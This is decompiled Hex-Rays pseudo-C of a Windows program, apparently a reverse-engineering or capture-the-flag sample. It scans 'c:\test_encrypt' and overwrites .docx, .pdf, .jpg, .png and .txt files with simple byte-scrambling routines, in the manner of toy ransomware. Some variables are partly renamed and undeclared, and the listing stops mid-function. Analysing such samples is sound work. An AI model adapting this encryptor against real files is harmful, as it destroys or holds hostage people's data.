/* This file has been generated by the Hex-Rays decompiler.
   Copyright (c) 2007-2017 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>

#include <stdarg.h>


//-------------------------------------------------------------------------
// Function declarations

void *sub_401000();
int sub_401006(int a1, ...);
void *sub_401034();
signed int sub_4010AA();
signed int sub_401148();
// signed int __usercall sub_4011D6@<eax>(int a1@<ebx>, int a2@<esi>);
// int __usercall sub_40155E@<eax>(int a1@<ebx>, int a2@<esi>);
// int __security_check_cookie(); weak
BOOL __cdecl sub_401577(struct _EXCEPTION_POINTERS *ExceptionInfo);
// BOOL __usercall sub_40159F@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>, char a4);
// BOOL __usercall sub_401698@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>);
// BOOL __usercall sub_4016A4@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>, unsigned int a4);
// int __usercall sub_401772@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>);
int sub_40181D(); // weak
int sub_401825();
// signed int __usercall start@<eax>(int a1@<ebp>, int a2@<esi>);
int __cdecl sub_4019C3(int a1, unsigned int a2);
char sub_401A07();
char __cdecl sub_401A39(int a1);
// char __usercall sub_401A72@<al>(int a1@<ebx>, int a2@<edi>, int a3);
bool __cdecl sub_401B17(int a1);
signed __int32 __cdecl sub_401BAB(char a1);
char __cdecl sub_401BC8(int a1, char a2);
int __cdecl sub_401BF0(int a1);
int __cdecl sub_401C2B(int a1);
unsigned int sub_401C40();
void sub_401C8D();
int sub_401CD8();
signed int sub_401CDB();
signed int sub_401CDF();
void sub_401CE5();
char sub_401CF1();
// errno_t __usercall sub_401CF4@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>);
int nullsub_1(void); // weak
void *sub_401D16();
_DWORD *sub_401D1C();
BOOL sub_401D39();
void *sub_401D45();
void *sub_401D4B();
// void __usercall sub_401D51(int a1@<ebx>, int a2@<edi>, int a3@<esi>, unsigned int a4);
int sub_401E6B(void); // weak
bool sub_401E70();
LPTOP_LEVEL_EXCEPTION_FILTER sub_401EB3();
LONG __stdcall TopLevelExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo); // idb
void sub_401F00();
int sub_401F08();
int sub_401F34();
int __cdecl sub_401FBB(int a1, int a2, int a3, int a4);
int sub_401FDE();
BOOL sub_402175();
// void *__cdecl memset(void *Dst, int Val, size_t Size);
// int __cdecl except_handler4_common(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); weak
// int __cdecl set_app_type(_DWORD); weak
// int __cdecl _setusermatherr(_DWORD); weak
// int __cdecl configure_narrow_argv(_DWORD); weak
// int initialize_narrow_environment(void); weak
// int get_initial_narrow_environment(void); weak
// int __cdecl initterm(_DWORD, _DWORD); weak
// int __cdecl initterm_e(_DWORD, _DWORD); weak
// void __cdecl __noreturn exit(int Code);
// void __cdecl __noreturn exit(int Code);
// errno_t __cdecl set_fmode(int Mode);
// int _p___argc(void); weak
// int _p___argv(void); weak
// int cexit(void); weak
// void __cdecl c_exit();
// int __cdecl register_thread_local_exe_atexit_callback(_DWORD); weak
// int __cdecl configthreadlocale(_DWORD); weak
// int __cdecl set_new_mode(_DWORD); weak
// int _p__commode(void); weak
// int __cdecl initialize_onexit_table(_DWORD); weak
// int __cdecl register_onexit_function(_DWORD); weak
// int __cdecl crt_atexit(_DWORD); weak
// errno_t __cdecl controlfp_s(unsigned int *CurrentState, unsigned int NewValue, unsigned int Mask);
// int __stdcall terminate(_DWORD); weak
// BOOL __stdcall IsProcessorFeaturePresent(DWORD ProcessorFeature);
// HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
// DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh);
// BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
// BOOL __stdcall CloseHandle(HANDLE hObject);
// BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
// HANDLE __stdcall FindFirstFileA(LPCSTR lpFileName, LPWIN32_FIND_DATAA lpFindFileData);
// BOOL __stdcall FindNextFileA(HANDLE hFindFile, LPWIN32_FIND_DATAA lpFindFileData);
// BOOL __stdcall IsDebuggerPresent();
// void __stdcall InitializeSListHead(PSLIST_HEADER ListHead);
// void __stdcall GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime);
// DWORD __stdcall GetCurrentThreadId();
// DWORD __stdcall GetCurrentProcessId();
// BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount);
// BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode);
// HANDLE __stdcall GetCurrentProcess();
// LPTOP_LEVEL_EXCEPTION_FILTER __stdcall SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter);
// LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo);
// HMODULE __stdcall GetModuleHandleW(LPCWSTR lpModuleName);
// LPSTR __stdcall PathFindExtensionA(LPCSTR pszPath);
// void *__cdecl malloc(size_t Size);
// void __cdecl free(void *Memory);
// int __cdecl _stdio_common_vfprintf(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); weak
// int __cdecl _acrt_iob_func(_DWORD); weak
// errno_t __cdecl strcat_s(char *Dst, rsize_t SizeInBytes, const char *Src);
// int __cdecl stricmp(const char *Str1, const char *Str2);
// errno_t __cdecl strcpy_s(char *Dst, rsize_t SizeInBytes, const char *Src);
// void __cdecl srand(unsigned int Seed);
// int __cdecl rand();

//-------------------------------------------------------------------------
// Data declarations

struct _EXCEPTION_POINTERS ExceptionInfo = { &dword_404120, &dword_404170 }; // idb
char g_buf[] = { 'A' }; // weak
_UNKNOWN unk_40368C; // weak
_UNKNOWN unk_403694; // weak
int dword_404000 = 1153374641; // weak
int __security_cookie = 3141592654; // weak
int dword_40400C = 1; // weak
int dword_404010 = 1; // weak
int dword_404014 = 1; // weak
CHAR Src[] = "c:\\test_encrypt\\*"; // idb
int dword_404120 = 0; // weak
int dword_404124 = 0; // weak
int dword_40412C = 0; // weak
int dword_404130 = 0; // weak
int dword_404134 = 0; // weak
int dword_404170 = 0; // weak
__int16 word_4041FC = 0; // weak
__int16 word_404200; // weak
__int16 word_404204; // weak
__int16 word_404208; // weak
int dword_40420C; // weak
int dword_404210; // weak
int dword_404214; // weak
int dword_404218; // weak
int dword_40421C; // weak
int dword_404220; // weak
int dword_404224; // weak
int dword_404228; // weak
__int16 word_40422C; // weak
int dword_404230; // weak
int dword_404234; // weak
__int16 word_404238; // weak
_UNKNOWN unk_404440; // weak
char byte_404444; // weak
char byte_404445; // weak
int dword_404448[3]; // idb
_DWORD dword_404454[3]; // idb
union _SLIST_HEADER ListHead; // idb
_UNKNOWN unk_404468; // weak
int dword_404470; // weak
int dword_404474; // weak
int dword_404478; // weak
DWORD nNumberOfBytesToWrite; // idb
size_t Size; // idb
LPCVOID lpBuffer; // idb
void *Memory; // idb
CHAR Dst[264]; // idb
_UNKNOWN unk_404598; // weak
_UNKNOWN unk_4045A0; // weak
_UNKNOWN unk_4045A4; // weak


//----- (00401000) --------------------------------------------------------
void *sub_401000()
{
  return &unk_404598;
}

//----- (00401006) --------------------------------------------------------
int sub_401006(int a1, ...)
{
  int v1; // ST08_4
  _DWORD *v2; // eax
  va_list va; // [esp+10h] [ebp+Ch]

  va_start(va, a1);
  v1 = _acrt_iob_func(1);
  v2 = sub_401000();
  return _stdio_common_vfprintf(*v2, v2[1], v1, a1, 0, va);
}
// 4030D8: using guessed type int __cdecl _stdio_common_vfprintf(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
// 4030DC: using guessed type int __cdecl _acrt_iob_func(_DWORD);

//----- (00401034) --------------------------------------------------------
void *sub_401034()
{
  _BYTE *v0; // ebx
  size_t v1; // esi
  void *result; // eax
  const void *v3; // edx
  _BYTE *v4; // edi
  int v5; // ebx
  char v6; // cl
  char v7; // al

  v0 = Memory;
  v1 = Size;
  nNumberOfBytesToWrite = Size;
  result = malloc(Size);
  v3 = result;
  if ( result )
  {
    if ( v1 )
    {
      v4 = result;
      v5 = v0 - (_BYTE *)result;
      while ( 1 )
      {
        v6 = v4[v5];
        if ( (unsigned __int8)(v6 - 65) <= 0x19u ){
          v7 = (-101 - v6) | 0x20;
        }
        if ( (unsigned __int8)(v6 - 97) <= 0x19u )
        {
          v7 = (-37 - v6) ^ 0x20;
          goto LABEL_10;
        }
        if ( (unsigned __int8)(v6 - 48) <= 9u )
        {
          v7 = 105 - v6;
          goto LABEL_10;
        }
LABEL_11:
        *v4++ = __ROL1__(v6, 2);
        if ( !--v1 )
          goto LABEL_12;
      }
      
LABEL_10:
      v6 = v7;
      goto LABEL_11;
    }
LABEL_12:
    lpBuffer = v3;
    result = (void *)1;
  }
  return result;
}

//----- (004010AA) --------------------------------------------------------
signed int sub_4010AA()
{
  HANDLE v0; // eax
  void *v1; // esi
  DWORD v3; // eax
  void *v4; // eax
  DWORD NumberOfBytesRead; // [esp+8h] [ebp-8h]

  v0 = CreateFileA(Dst, 0xC0000000, 0, 0, 3u, 0x80u, 0);
  v1 = v0;
  if ( v0 == (HANDLE)-1 )
  {
    sub_401006((int)"Error: Cannot open input.txt.\n");
    return 0;
  }
  v3 = GetFileSize(v0, 0);
  Size = v3;
  v4 = malloc(v3);
  Memory = v4;
  if ( !v4 )
  {
    sub_401006((int)"Error: Cannot malloc.\n");
    return 0;
  }
  if ( !ReadFile(v1, v4, Size, &NumberOfBytesRead, 0) )
  {
    sub_401006((int)"Error: Cannot read input.txt.\n");
    return 0;
  }
  CloseHandle(v1);
  return 1;
}

//----- (00401148) --------------------------------------------------------
signed int sub_401148()
{
  LPCVOID v0; // ebx
  DWORD v1; // edi
  HANDLE v2; // esi
  DWORD NumberOfBytesWritten; // [esp+Ch] [ebp-8h]

  v0 = lpBuffer;
  v1 = nNumberOfBytesToWrite;
  v2 = CreateFileA(Dst, 0x40000000u, 0, 0, 2u, 0x80u, 0);
  if ( v2 == (HANDLE)-1 )
  {
    sub_401006((int)"Error: Cannot open file %S.\n", Dst);
    return 0;
  }
  if ( !WriteFile(v2, v0, v1, &NumberOfBytesWritten, 0) )
  {
    sub_401006((int)"Error: Cannot write file %S.\n", Dst);
    return 0;
  }
  CloseHandle(v2);
  return 1;
}

//----- (004011D6) --------------------------------------------------------
signed int __usercall sub_4011D6@<eax>(int a1@<ebx>, int a2@<esi>)
{
  HANDLE v2; // edi
  unsigned int v4; // ecx
  int (__cdecl *v5)(const char *, const char *); // ebx
  const char *v6; // eax
  const char *v7; // esi
  size_t v8; // esi
  _BYTE *v9; // edi
  _BYTE *v10; // eax
  _BYTE *v11; // edx
  _BYTE *v12; // ecx
  int v13; // edi
  size_t v14; // esi
  void *v15; // eax
  const void *v16; // edi
  _BYTE *v17; // ebx
  int v18; // edi
  char v19; // cl
  size_t v20; // esi
  _BYTE *v21; // edi
  size_t v22; // ecx
  size_t v23; // esi
  _BYTE *v24; // edi
  _BYTE *v25; // eax
  _BYTE *v26; // ecx
  int v27; // edi
  char v28; // [esp+13h] [ebp-155h]
  HANDLE v29; // [esp+14h] [ebp-154h]
  _BYTE *v30; // [esp+18h] [ebp-150h]
  const void *v31; // [esp+1Ch] [ebp-14Ch]
  struct _WIN32_FIND_DATAA FindFileData; // [esp+20h] [ebp-148h]

  v2 = FindFirstFileA(Src, &FindFileData);
  v29 = v2;
  if ( v2 == (HANDLE)-1 )
    return 0;
  v4 = strlen(Src) - 1;
  if ( v4 >= 0x104 )
  {
    sub_401698(a1, (int)v2, a2);
    __debugbreak();
    JUMPOUT(*(_DWORD *)sub_40155E);
  }
  v5 = stricmp;
  Src[v4] = 0;
  do
  {
    if ( FindFileData.dwFileAttributes & 0x10 )
      continue;
    strcpy_s(Dst, 0x104u, Src);
    strcat_s(Dst, 0x104u, FindFileData.cFileName);
    v6 = PathFindExtensionA(FindFileData.cFileName);
    v7 = v6;
    if ( !v6 )
      continue;
    if ( v5(v6, ".docx") )
    {
      if ( !v5(v7, ".pdf") )
      {
        if ( !sub_4010AA() )
          goto LABEL_17;
        sub_401006((int)"Encrypting PDF file: %s\n", FindFileData.cFileName);
        len = Size;
        v30 = Memory;
        COUNT = 0;
        srand(Size);
        nNumberOfBytesToWrite = len;
        enc_buf = malloc(len);
        v16 = enc_buf;
        v31 = enc_buf;
        if ( enc_buf )
        {
          if ( len )
          {
            v17 = enc_buf;
            v18 = v30 - (_BYTE *)enc_buf;
            do
            {
              v19 = COUNT + (rand() ^ v17[v18]);
              *v17++ = v19;
              COUNT = v19;
              --len;
            }
            while ( len );
            v16 = v31;
            v5 = stricmp;
          }
          lpBuffer = v16;
          goto LABEL_15;
        }
        goto LABEL_16;
      }
      if ( !v5(v7, ".jpg") )
      {
        if ( !sub_4010AA() )
          goto LABEL_17;
        sub_401006((int)"Encrypting JPG file: %s\n", FindFileData.cFileName);
        len = Size;
        v21 = Memory;
        nNumberOfBytesToWrite = 2 * Size;
        enc_buf = malloc(2 * Size);
        if ( enc_buf )
        {
          counter = 0;
          if ( len )
          {
            do
            {
              enc_buf[2 * counter] = g_buf[(unsigned int)(unsigned __int8)FILE[counter] >> 4];
              enc_buf[2 * counter + 1] = g_buf[FILE[counter] & 0xF];
              ++counter;
            }
            while ( counter < len );
          }
          goto LABEL_14;
        }
        goto LABEL_16;
      }
      if ( v5(v7, ".png") )
      {
        if ( !v5(v7, ".txt") )
        {
          if ( sub_4010AA() )
          {
            sub_401006((int)"Encrypting text file: %s\n", FindFileData.cFileName);
            if ( sub_401034() )
              sub_401148();
          }
        }
        goto LABEL_17;
      }
      if ( sub_4010AA() )
      {
        sub_401006((int)"Encrypting PNG file: %s\n", FindFileData.cFileName);
        v23 = Size;
        v24 = Memory;
        nNumberOfBytesToWrite = Size;
        v25 = malloc(Size);
        v11 = v25;
        if ( v25 )
        {
          if ( v23 )
          {
            buffer = v25;
            idx = v24 - v25;
            do
            {
              *buffer = __ROL1__(buffer[idx] ^ 0x44, 4);
              ++buffer;
              --v23;
            }
            while ( v23 );
          }
LABEL_14:
          lpBuffer = v11;
LABEL_15:
          sub_401148();
        }
LABEL_16:
        v2 = v29;
        goto LABEL_17;
      }
    }
    else if ( sub_4010AA() )
    {
      sub_401006((int)"Encrypting DOCX file: %s\n", FindFileData.cFileName);
      v8 = Size;
      v9 = Memory;
      nNumberOfBytesToWrite = Size;
      v10 = malloc(Size);
      v11 = v10;
      if ( v10 )
      {
        if ( v8 )
        {
          v12 = v10;
          v13 = v9 - v10;
          do
          {
            *v12 = (((v12[v13] + 5) ^ 0x8B) - 77) ^ 0xC1;
            ++v12;
            --v8;
          }
          while ( v8 );
        }
        goto LABEL_14;
      }
      goto LABEL_16;
    }
LABEL_17:
    if ( Memory )
    {
      free(Memory);
      Memory = 0;
    }
    if ( lpBuffer )
    {
      free((void *)lpBuffer);
      lpBuffer = 0;
    }
  }
  while ( FindNextFileA(v2, &FindFileData) );
  return 1;
}

//----- (0040155E) --------------------------------------------------------
int __usercall sub_40155E@<eax>(int a1@<ebx>, int a2@<esi>)
{
  sub_4011D6(a1, a2);
  return 0;
}

//----- (00401577) --------------------------------------------------------
BOOL __cdecl sub_401577(struct _EXCEPTION_POINTERS *ExceptionInfo)
{
  HANDLE v1; // eax

  SetUnhandledExceptionFilter(0);
  UnhandledExceptionFilter(ExceptionInfo);
  v1 = GetCurrentProcess();
  return TerminateProcess(v1, 0xC0000409);
}

//----- (0040159F) --------------------------------------------------------
BOOL __usercall sub_40159F@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>, char a4)
{
  int v4; // edx
  int v5; // ecx
  unsigned int v6; // et0
  int vars0; // [esp+324h] [ebp+0h]
  int retaddr; // [esp+328h] [ebp+4h]

  if ( IsProcessorFeaturePresent(0x17u) )
    __fastfail(2u);
  dword_404220 = 0;
  dword_40421C = v5;
  dword_404218 = v4;
  dword_404214 = a1;
  dword_404210 = a3;
  dword_40420C = a2;
  word_404238 = __SS__;
  word_40422C = __CS__;
  word_404208 = __DS__;
  word_404204 = __ES__;
  word_404200 = __FS__;
  word_4041FC = __GS__;
  v6 = __readeflags();
  dword_404230 = v6;
  dword_404224 = vars0;
  dword_404228 = retaddr;
  dword_404234 = (int)&a4;
  dword_404170 = 65537;
  dword_40412C = retaddr;
  dword_404120 = -1073740791;
  dword_404124 = 1;
  dword_404130 = 1;
  dword_404134 = 2;
  return sub_401577(&ExceptionInfo);
}
// 404120: using guessed type int dword_404120;
// 404124: using guessed type int dword_404124;
// 40412C: using guessed type int dword_40412C;
// 404130: using guessed type int dword_404130;
// 404134: using guessed type int dword_404134;
// 404170: using guessed type int dword_404170;
// 4041FC: using guessed type __int16 word_4041FC;
// 404200: using guessed type __int16 word_404200;
// 404204: using guessed type __int16 word_404204;
// 404208: using guessed type __int16 word_404208;
// 40420C: using guessed type int dword_40420C;
// 404210: using guessed type int dword_404210;
// 404214: using guessed type int dword_404214;
// 404218: using guessed type int dword_404218;
// 40421C: using guessed type int dword_40421C;
// 404220: using guessed type int dword_404220;
// 404224: using guessed type int dword_404224;
// 404228: using guessed type int dword_404228;
// 40422C: using guessed type __int16 word_40422C;
// 404230: using guessed type int dword_404230;
// 404234: using guessed type int dword_404234;
// 404238: using guessed type __int16 word_404238;

//----- (00401698) --------------------------------------------------------
BOOL __usercall sub_401698@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>)
{
  return sub_4016A4(a1, a2, a3, 8u);
}

//----- (004016A4) --------------------------------------------------------
BOOL __usercall sub_4016A4@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>, unsigned int a4)
{
  int v4; // edx
  int v5; // ecx
  unsigned int v6; // et0
  int vars0; // [esp+31Ch] [ebp+0h]
  int retaddr; // [esp+320h] [ebp+4h]

  if ( IsProcessorFeaturePresent(0x17u) )
    __fastfail(a4);
  dword_404220 = 0;
  dword_40421C = v5;
  dword_404218 = v4;
  dword_404214 = a1;
  dword_404210 = a3;
  dword_40420C = a2;
  word_404238 = __SS__;
  word_40422C = __CS__;
  word_404208 = __DS__;
  word_404204 = __ES__;
  word_404200 = __FS__;
  word_4041FC = __GS__;
  v6 = __readeflags();
  dword_404230 = v6;
  dword_404224 = vars0;
  dword_404228 = retaddr;
  dword_404234 = (int)&a4;
  dword_40412C = retaddr;
  dword_404120 = -1073740791;
  dword_404124 = 1;
  dword_404130 = 1;
  dword_404134 = a4;
  return sub_401577(&ExceptionInfo);
}
// 404120: using guessed type int dword_404120;
// 404124: using guessed type int dword_404124;
// 40412C: using guessed type int dword_40412C;
// 404130: using guessed type int dword_404130;
// 404134: using guessed type int dword_404134;
// 4041FC: using guessed type __int16 word_4041FC;
// 404200: using guessed type __int16 word_404200;
// 404204: using guessed type __int16 word_404204;
// 404208: using guessed type __int16 word_404208;
// 40420C: using guessed type int dword_40420C;
// 404210: using guessed type int dword_404210;
// 404214: using guessed type int dword_404214;
// 404218: using guessed type int dword_404218;
// 40421C: using guessed type int dword_40421C;
// 404220: using guessed type int dword_404220;
// 404224: using guessed type int dword_404224;
// 404228: using guessed type int dword_404228;
// 40422C: using guessed type __int16 word_40422C;
// 404230: using guessed type int dword_404230;
// 404234: using guessed type int dword_404234;
// 404238: using guessed type __int16 word_404238;

//----- (00401772) --------------------------------------------------------
int __usercall sub_401772@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>)
{
  int v3; // ST0C_4
  int v4; // eax
  int *v5; // esi
  int v6; // esi
  signed int v7; // eax
  int v8; // eax
  int result; // eax

  v3 = a3;
  set_app_type(1);
  v4 = sub_401CDF();
  set_fmode(v4);
  v5 = (int *)_p__commode();
  *v5 = sub_401CD8();
  v6 = v3;
  if ( !sub_401A72(a1, a2, 1) )
    goto LABEL_12;
  __asm { fnclex }
  sub_401F08();
  sub_401C2B((int)sub_401F34);
  v7 = sub_401CDB();
  if ( configure_narrow_argv(v7) )
    goto LABEL_12;
  sub_401CE5();
  if ( sub_401D39() )
    _setusermatherr(sub_401CD8);
  nullsub_1();
  nullsub_1();
  sub_401CF4(a1, a2, v6);
  v8 = sub_401CD8();
  configthreadlocale(v8);
  if ( sub_401CF1() )
    initialize_narrow_environment();
  sub_401CD8();
  result = sub_401E6B();
  if ( result )
  {
LABEL_12:
    sub_401D51(a1, a2, v6, 7u);
    __debugbreak();
    JUMPOUT(*(_DWORD *)sub_40181D);
  }
  return result;
}
// 401772: could not find valid save-restore pair for esi
// 40181D: using guessed type int sub_40181D();
// 401D15: using guessed type int nullsub_1(void);
// 401E6B: using guessed type int sub_401E6B(void);
// 402193: using guessed type int __cdecl set_app_type(_DWORD);
// 402199: using guessed type int __cdecl _setusermatherr(_DWORD);
// 40219F: using guessed type int __cdecl configure_narrow_argv(_DWORD);
// 4021A5: using guessed type int initialize_narrow_environment(void);
// 4021ED: using guessed type int __cdecl configthreadlocale(_DWORD);
// 4021F9: using guessed type int _p__commode(void);

//----- (0040181D) --------------------------------------------------------
int sub_40181D()
{
  sub_401D1C();
  return 0;
}
// 40181D: using guessed type int sub_40181D();

//----- (00401825) --------------------------------------------------------
int sub_401825()
{
  int v0; // eax

  sub_401EB3();
  v0 = sub_401CD8();
  return set_new_mode(v0);
}
// 4021F3: using guessed type int __cdecl set_new_mode(_DWORD);

//----- (004019C3) --------------------------------------------------------
int __cdecl sub_4019C3(int a1, unsigned int a2)
{
  int v2; // ecx
  int v3; // edx
  int v4; // esi

  v2 = a1 + *(_DWORD *)(a1 + 60);
  v3 = *(unsigned __int16 *)(v2 + 20) + v2 + 24;
  v4 = v3 + 40 * *(unsigned __int16 *)(v2 + 6);
  if ( v3 == v4 )
    return 0;
  while ( a2 < *(_DWORD *)(v3 + 12) || a2 >= *(_DWORD *)(v3 + 12) + *(_DWORD *)(v3 + 8) )
  {
    v3 += 40;
    if ( v3 == v4 )
      return 0;
  }
  return v3;
}

//----- (00401A07) --------------------------------------------------------
char sub_401A07()
{
  signed __int32 v0; // edx
  signed __int32 v1; // eax

  if ( sub_402175() )
  {
    v0 = *(_DWORD *)(__readfsdword(0x18u) + 4);
    while ( 1 )
    {
      v1 = _InterlockedCompareExchange((volatile signed __int32 *)&unk_404440, v0, 0);
      if ( !v1 )
        break;
      if ( v0 == v1 )
        return 1;
    }
  }
  return 0;
}

//----- (00401A39) --------------------------------------------------------
char __cdecl sub_401A39(int a1)
{
  if ( !a1 )
    byte_404444 = 1;
  sub_401FDE();
  if ( !sub_401CF1() )
    return 0;
  if ( !sub_401CF1() )
  {
    sub_401CF1();
    return 0;
  }
  return 1;
}
// 404444: using guessed type char byte_404444;

//----- (00401A72) --------------------------------------------------------
char __usercall sub_401A72@<al>(int a1@<ebx>, int a2@<edi>, int a3)
{
  char v4; // cl
  int v5; // eax
  int v6; // ST14_4

  if ( byte_404445 )
    return 1;
  if ( a3 && a3 != 1 )
  {
    sub_401D51(a1, a2, a3, 5u);
    __debugbreak();
    JUMPOUT(*(_DWORD *)sub_401B17);
  }
  if ( !sub_402175() || a3 )
  {
    v4 = 32 - (__security_cookie & 0x1F);
    v5 = __security_cookie ^ __ROR4__(-1, v4);
    v6 = __security_cookie ^ __ROR4__(-1, v4);
    dword_404448[0] = __security_cookie ^ __ROR4__(-1, v4);
    dword_404448[1] = __security_cookie ^ __ROR4__(-1, v4);
    dword_404448[2] = v6;
    dword_404454[0] = v5;
    dword_404454[1] = v5;
    dword_404454[2] = v5;
  }
  else if ( initialize_onexit_table(dword_404448) || initialize_onexit_table(dword_404454) )
  {
    return 0;
  }
  byte_404445 = 1;
  return 1;
}
// 4021FF: using guessed type int __cdecl initialize_onexit_table(_DWORD);
// 404445: using guessed type char byte_404445;

//----- (00401B17) --------------------------------------------------------
bool __cdecl sub_401B17(int a1)
{
  int v1; // eax
  bool result; // al

  result = 0;
  if ( MEMORY[0x400000] == 23117
    && *(_DWORD *)(MEMORY[0x40003C] + 0x400000) == 17744
    && *(_WORD *)(MEMORY[0x40003C] + 4194328) == 267 )
  {
    v1 = sub_4019C3(0x400000, a1 - 0x400000);
    if ( v1 )
    {
      if ( *(_DWORD *)(v1 + 36) >= 0 )
        result = 1;
    }
  }
  return result;
}

//----- (00401BAB) --------------------------------------------------------
signed __int32 __cdecl sub_401BAB(char a1)
{
  signed __int32 result; // eax

  result = sub_402175();
  if ( result )
  {
    if ( !a1 )
      result = _InterlockedExchange((volatile signed __int32 *)&unk_404440, 0);
  }
  return result;
}

//----- (00401BC8) --------------------------------------------------------
char __cdecl sub_401BC8(int a1, char a2)
{
  if ( !byte_404444 || !a2 )
  {
    sub_401CF1();
    sub_401CF1();
  }
  return 1;
}
// 404444: using guessed type char byte_404444;

//----- (00401BF0) --------------------------------------------------------
int __cdecl sub_401BF0(int a1)
{
  int v1; // eax

  if ( __ROR4__(dword_404448[0] ^ __security_cookie, __security_cookie & 0x1F) == -1 )
    v1 = crt_atexit(a1);
  else
    v1 = register_onexit_function(dword_404448);
  return v1 == 0 ? a1 : 0;
}
// 402205: using guessed type int __cdecl register_onexit_function(_DWORD);
// 40220B: using guessed type int __cdecl crt_atexit(_DWORD);

//----- (00401C2B) --------------------------------------------------------
int __cdecl sub_401C2B(int a1)
{
  return (sub_401BF0(a1) != 0) - 1;
}

//----- (00401C40) --------------------------------------------------------
unsigned int sub_401C40()
{
  LARGE_INTEGER PerformanceCount; // [esp+0h] [ebp-14h]
  struct _FILETIME SystemTimeAsFileTime; // [esp+8h] [ebp-Ch]
  DWORD v3; // [esp+10h] [ebp-4h]

  SystemTimeAsFileTime.dwLowDateTime = 0;
  SystemTimeAsFileTime.dwHighDateTime = 0;
  GetSystemTimeAsFileTime(&SystemTimeAsFileTime);
  v3 = SystemTimeAsFileTime.dwLowDateTime ^ SystemTimeAsFileTime.dwHighDateTime;
  v3 ^= GetCurrentThreadId();
  v3 ^= GetCurrentProcessId();
  QueryPerformanceCounter(&PerformanceCount);
  return (unsigned int)&v3 ^ v3 ^ PerformanceCount.s.LowPart ^ PerformanceCount.s.HighPart;
}

//----- (00401C8D) --------------------------------------------------------
void sub_401C8D()
{
  int v0; // ecx
  unsigned int v1; // eax

  v0 = __security_cookie;
  if ( __security_cookie == -1153374642 || !(__security_cookie & 0xFFFF0000) )
  {
    v1 = sub_401C40();
    v0 = v1;
    if ( v1 == -1153374642 )
    {
      v0 = -1153374641;
    }
    else if ( !(v1 & 0xFFFF0000) )
    {
      v0 = ((v1 | 0x4711) << 16) | v1;
    }
    __security_cookie = v0;
  }
  dword_404000 = ~v0;
}
// 404000: using guessed type int dword_404000;

//----- (00401CD8) --------------------------------------------------------
int sub_401CD8()
{
  return 0;
}

//----- (00401CDB) --------------------------------------------------------
signed int sub_401CDB()
{
  return 1;
}

//----- (00401CDF) --------------------------------------------------------
signed int sub_401CDF()
{
  return 0x4000;
}

//----- (00401CE5) --------------------------------------------------------
void sub_401CE5()
{
  InitializeSListHead(&ListHead);
}

//----- (00401CF1) --------------------------------------------------------
char sub_401CF1()
{
  return 1;
}

//----- (00401CF4) --------------------------------------------------------
errno_t __usercall sub_401CF4@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>)
{
  errno_t result; // eax

  result = controlfp_s(0, 0x10000u, 0x30000u);
  if ( result )
  {
    sub_401D51(a1, a2, a3, 7u);
    __debugbreak();
    JUMPOUT(*(_DWORD *)nullsub_1);
  }
  return result;
}
// 401D15: using guessed type int nullsub_1(void);

//----- (00401D16) --------------------------------------------------------
void *sub_401D16()
{
  return &unk_404468;
}

//----- (00401D1C) --------------------------------------------------------
_DWORD *sub_401D1C()
{
  _DWORD *v0; // eax
  int v1; // ecx
  _DWORD *result; // eax
  int v3; // ecx

  v0 = sub_401000();
  v1 = v0[1];
  *v0 |= 4u;
  v0[1] = v1;
  result = sub_401D16();
  v3 = result[1];
  *result |= 2u;
  result[1] = v3;
  return result;
}

//----- (00401D39) --------------------------------------------------------
BOOL sub_401D39()
{
  return dword_40400C == 0;
}
// 40400C: using guessed type int dword_40400C;

//----- (00401D45) --------------------------------------------------------
void *sub_401D45()
{
  return &unk_4045A4;
}

//----- (00401D4B) --------------------------------------------------------
void *sub_401D4B()
{
  return &unk_4045A0;
}

//----- (00401D51) --------------------------------------------------------
void __usercall sub_401D51(int a1@<ebx>, int a2@<edi>, int a3@<esi>, unsigned int a4)
{
  void *v4; // eax
  int v5; // ecx
  int v6; // edx
  unsigned int v7; // et0
  BOOL v8; // eax
  bool v9; // bl
  int Dst; // [esp+8h] [ebp-324h]
  __int16 v11; // [esp+94h] [ebp-298h]
  __int16 v12; // [esp+98h] [ebp-294h]
  __int16 v13; // [esp+9Ch] [ebp-290h]
  __int16 v14; // [esp+A0h] [ebp-28Ch]
  int v15; // [esp+A4h] [ebp-288h]
  int v16; // [esp+A8h] [ebp-284h]
  int v17; // [esp+ACh] [ebp-280h]
  int v18; // [esp+B0h] [ebp-27Ch]
  int v19; // [esp+B4h] [ebp-278h]
  void *v20; // [esp+B8h] [ebp-274h]
  int v21; // [esp+BCh] [ebp-270h]
  int v22; // [esp+C0h] [ebp-26Ch]
  __int16 v23; // [esp+C4h] [ebp-268h]
  unsigned int v24; // [esp+C8h] [ebp-264h]
